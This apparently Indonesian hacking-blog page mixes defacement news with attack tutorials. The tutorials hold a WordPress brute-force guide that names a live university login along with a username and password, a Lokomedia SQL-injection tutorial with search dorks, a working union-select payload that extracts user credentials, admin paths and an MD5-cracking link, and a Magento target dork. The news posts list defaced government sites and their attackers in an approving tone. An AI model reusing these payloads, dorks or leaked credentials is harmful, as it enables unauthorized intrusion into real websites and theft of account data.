Tutorial Wordpress Brute Force

assalamualaikumm.. ane mau share nih gimana caranya Wordpress Brute Force ? langsung aja di simik video nya yaa .. 

dork : inurl:/wp-login.php 

live target : http://uniat.ac.id/univ/wp-admin/ 

user : diffa

pass : diffapengenganteng

Spesial Thanks To : https://www.facebook.com/Abrasax1337

Read more

Subdomain Kemdikbud Diretas, Defacer Kritik Kebijakan Medikbud Baru

Minggu minggu ini memang sedang hangat wacana Kemdikbud baru untuk mencanangkan Full Day School. Yah meskipun tidak berarti itu belajar seharian di sekolah, nampaknya wacana tersebut menuai banyak protes dari banyak kalangan. Tak terkecuali dari kalangan underground. Defacer dari tim " indoxploit " meretas subdomain Kemdikbud, tepatnya pada bagian Jurnal Pendidikan dan Kebudayaan.

Defacer yang meretas jurnaldikbud.kemdikbud.go.id tersebut menilai pihak Mendikbud tidak bisa menilai sisi positif maupun negatif dari kebijakan yang diambil.

Meskipun defacer tersebut tidak meretas halaman depan, namun pesan yang disampaikan oleh defacer tersebut tetap wajib diperhatikan. Berikut pesan yang tertulis di halaman deface nya :

root@l0c4lh34rtz ~ $ ./ngaco

Haduhh haduhhhh , lagi lagiiii bikin muak aja pakkk.

baruuu jadi menteri, udah keluarin kebijakan baru ajaaa.

Full day School?? hadehhh maksudnya apa lagii pakk??

kita yang balik jam 3 aja udah males, banyak yang bolos. ini mau full day school. :v tambah males aja pak :v

tolong kalo mau bikin kebijakan , pikir dulu sisi-sisi positif dan negatif nya pak.

kan semuanya ga harus di ambil dari positif, belajar sampe jam 3 aja otak mumet, apalagi "kalo bener-bener" sampe di tambah jam belajarnya.

pinter kgk , mumet iya pakkkk.

salam dehh, pakkk. semoga di revisi lagi kebijakannyaaa.

dan di perjelas maksud dan tujuannya, biar kebijakannya ga bikin orang pusinggg :v

- >> indoxploit << --

tu5b0l3d - shor7cut - sohai sec7or - x'1n7ect - k3c0t - bunglon_ijo - ustadcage48 - nabilaholic404 - fvckthan - magelang6etar

Mr. Xenophobic - strlen - ./L1ght_R00t - ./Mr. J - cyber_taregh - rieqyns13 - Mr Z - Coup de Grace - ./Mr.GLADz404 

Sampai berita ini dipublish belum ada perbaikan dari situs yang bersangkutan sehingga kemungkinan admin dari situs tersebut juga beum bergerak untuk menutup bug yang ada.

Namun kaian bisa melihat mirror nya disini :

https://defacer.id/134194.html

Sekian berita pagi hari ini, terimakasih. (jack/lsc)

Read more

Tutorial Deface Sql Lokomedia + Tamper Data + Upload Shell + Tebas Index

inurl:statis-1-profil.html inurl:statis-2-profil.html inurl:statis-3-strukturorganisasi.html inurl:statis-1-visimisi.html inurl:statis-1-tujuan.html exploit : /statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html ubah sendiri exploitnya :') ( gak vuln cari target lain ) biasanya admin login nya /redaktur /adminweb /administrator /redaktur/index.php /adminlogin /admin /login.php

kalau udah md5nya hash di sini > https://hashkiller.co.uk/md5-decrypter.aspx

Langsung aja Videonya Cek Di bawah ini :) 

Read more

Sanjungan Jiwa Kembali Beraksi, Situs Badan SAR Nasional Jadi Korban

Hari ini kembali LinuxSec mengabarkan kasus peretasan yang menimpa situs penting di Indonesia. Sebelumnya tentu masih kalian ingat saat defacer dengan kodenama "ice-cream" meretas subdomain UGM beberapa hari yang lalu, kali ini dia kembali beraksi dengan meretas situs Badan SAR Nasional.

Seperti kasus peretasan Subdomain UGM beberapa waktu lalu, nampaknya tidak ada motif khusus di aksi peretasan Basarnas kali ini. Terbukti hanya pesan 

" Kindly Fix The Bug Immediately"

Yang menunjukkan defacer dengan kodenama ice-cream ini berharap sang admin segera melakukan patching terhadap celah yang ada di situs basarnas.

Selain itu, pelaku juga meninggalkan beberapa nama / nick defacer yang kemungkinan adalah temannya atau mungkin juga sesama member di tim Sanjungan Jiwa sendiri.

Jje Incovers - Strlen - ReC0ded - Pak Haxor - Isal Dot ID - ViruzTomcat - Topi Jerami - Wonka - AdrElite - Mr Error404 - condetg3tar - Panataran - ./L1ght_R00t - eX-Sh1Ne - Podol - Eitaro Attacker - KONSLET - CaptSalkus48 - AnoaGhost - $n00.py - Virulent-ID - Sh0uT0u7 - Saviour Attacker - Wolfon - Rebels - MR.INTERCEPTION

Selain meretas domain utama Basarnas, ice-cream juga meretas 33 subdomain tiap regional dari Basarnas sendiri. Berikut list situs yag dia retas.

www.basarnas.go.id

www.tanjungpinang.basarnas.go.id

www.bandung.basarnas.go.id

www.balikpapan.basarnas.go.id

www.banjarmasin.basarnas.go.id

www.aceh.basarnas.go.id

www.ambon.basarnas.go.id

www.bengkulu.basarnas.go.id

www.biak.basarnas.go.id

www.denpasar.basarnas.go.id

www.jakarta.basarnas.go.id

www.jambi.basarnas.go.id

www.jayapura.basarnas.go.id

www.kendari.basarnas.go.id

www.kupang.basarnas.go.id

www.lampung.basarnas.go.id

www.gorontalo.basarnas.go.id

www.manado.basarnas.go.id

www.makassar.basarnas.go.id

www.medan.basarnas.go.id

www.merauke.basarnas.go.id

www.palembang.basarnas.go.id

www.padang.basarnas.go.id

www.palu.basarnas.go.id

www.semarang.basarnas.go.id

www.pangkalpinang.basarnas.go.id

www.pekanbaru.basarnas.go.id

www.surabaya.basarnas.go.id

www.sorong.basarnas.go.id

www.timika.basarnas.go.id

www.ternate.basarnas.go.id

www.yogyakarta.basarnas.go.id

www.manokwari.basarnas.go.id

www.mataram.basarnas.go.id

Saat berita ini diturunkan, domain utama basarnas dalam keadaan under maintenance, namun untuk subdomainnya rata rata masih dalam keadaan di deface.

Untuk mirror nya bisa cek disini :

basarnas.go.id hacked by ice-cream

Untuk subdomainnya, hanya beberapa yang di notif dengan kodenama ice-cream karena sebelumnya sudah ada defacer lain pada bulan februari lalu yang mensubmit puluhan subdomain basarnas ke zone-h.

Semoa saja web web yang bersangkutan segera diperbaiki. Sekian berita kali ini dan selamat beraktivitas. (jack/lsc)

Read more

Perpustakaan Inspektorat Jenderal Kementerian Agama R.I Diretas Malaikat galau

Hari ini kembali LinuxSec mengabarkan aksi peretasan yang dilakukan oleh defacer terhadap situs dalam negeri. Kali ini korbannya adalah Perpustakaan Inspektorat Jenderal Kementerian Agama R.I atau subdomain dari kemenag.go.id.

Pelaku hanya menitipkan file " hack.html " pada direktori "python " situs portalitjen.kemenag.go.id.

Tidak ada pesan khusus yang ditujukan kepada admin ataupun pihak Kementerian Agama. Hanya notice berikut :

INDONESIA DEFACER TERSAKITI HERE MALAIKAT GALAU

Pelaku nampaknya hanya iseng saja meretas subdomain dari kemenag.go.id tersebut.

Dengan adanya peretasan ini mendambah daftar situs pemerintah yang menjadi korban iseng dari defacer defacer yang rata rata berasal dari dalam negeri sendiri. Hal ini menunjukkan betapa lemahnya keamanan situs situs pemerintahan kita.

bahkan tidak jarang admin admin dari situs pemerintahan bertndak sangat lambat terhadap aksi peretasan.

Seperti contohnya dalam kasus kali ini, sampai berita ini dipublish belum ada perbaikan dari situs yang bersangkutan.

Untuk mirror nya bisa kalian cek disini :

http://zone-h.org/mirror/id/26637404

Oke sekian berita siang hari ini, selamat beraktivitas. (jack/lsc)

Read more

Google Hapus Palestina di Google Maps Google kemudian mengganti Palestina dengan Israel

assalamualaikum.. Save Palestina !! Allahu Akbar .. Palestina telah hilang di google maps -_-
dan diganti dgn Israel ?

Google sedang mendapat kritikan tajam dari Forum Jurnalis Palestina. Pangkalnya yakni keputusan Google yang menghapus nama Palestina dari peta Google Maps dan menggantinya dengan Israel. Penghapusan nama Palestina itu dilakukan pada 25 Juli.

Dikutip dari Middleeastmonitor, Jumat 5 Agustus 2016, dalam pernyataan yang dirilis pada Kamis kemarin, forum jurnalis tersebut menuding keputusan Google menghapus nama Palestina dari Google Maps merupakan bagian dari skema Israel untuk membuat legitimasi negara zionis tersebut.

"Ini merupakan skema untuk membumikan nama Israel sebagai negara yang sah untuk generasi mendatang dan menghapus nama Palestina untuk selamanya," tulis pernyataan forum tersebut.

Forum itu menilai langkah penghapusan nama Palestina dari Google Maps itu dirancang untuk memutarbalikkan sejarah, geografi serta memalsukan hak rakyat Palestina atas tanah air mereka.

"Langkah ini merupakan upaya kegagalan untuk merusak memori rakyat Palestina, Arab dan Dunia," kata Forum itu.

Forum Jurnalis Palestina menegaskan, langkah Google itu bertentangan dengan semua norma dan konvensi internasional. Mereka menekankan Google harus menarik kembali perubahan nama Palestina dalam Google Maps tersebut.

Read more

Magento Tools & File System Magento Download

assalamualaikum .. ane mau share magento toolss .. 

dork : intext:magento inurl:/account/login site:.uk

tuh dork magento .. gonta ganti site nya boy ..

Download = Magento Tools

Download File System = File System Magento

terima kasih atas kunjungan andaaaaaaaa.... 

Read more

SMPN 32 BEKASI Setelah di Deface Siswanya, Akhirnya di Suspend.

SMPN 32 Bekasi yang sebelumnya di deface oleh siswanya sendiri sekarang akhirnya websitenya di Suspend dan sekarang tidak dapat di akses lagi.

Saya berhasil mewawancarai siswa SMPN 32 Bekasi yang meretas website tersebut. Dari hasil wawancara tersebut saya dapat menyimpulkan bahwa memang yang meretas website tersebut adalah siswa dari sekolah itu sendiri dan berarti dia duduk di bangku SMP yang tergolong masih muda.

Hacker muda tersebut mengatakan ia merasa senang setelah website sekolahnya di suspend dan tidak bisa di akses lagi. Namun ia mengatakan bahwa sampai sekarang belum ada respon dari guru-gurunya ntah karena gurunya tidak mengetahui dia pelaku peretasan tersebut atau memang gurunya tidak mengambil pusing terhadap peretasan yang ia lakukan.

Walaupun websitenya sudah di suspend, kita masih bisa melihat mirrornya di http://aljyyosh.org/mirror.php?id=173781

Read more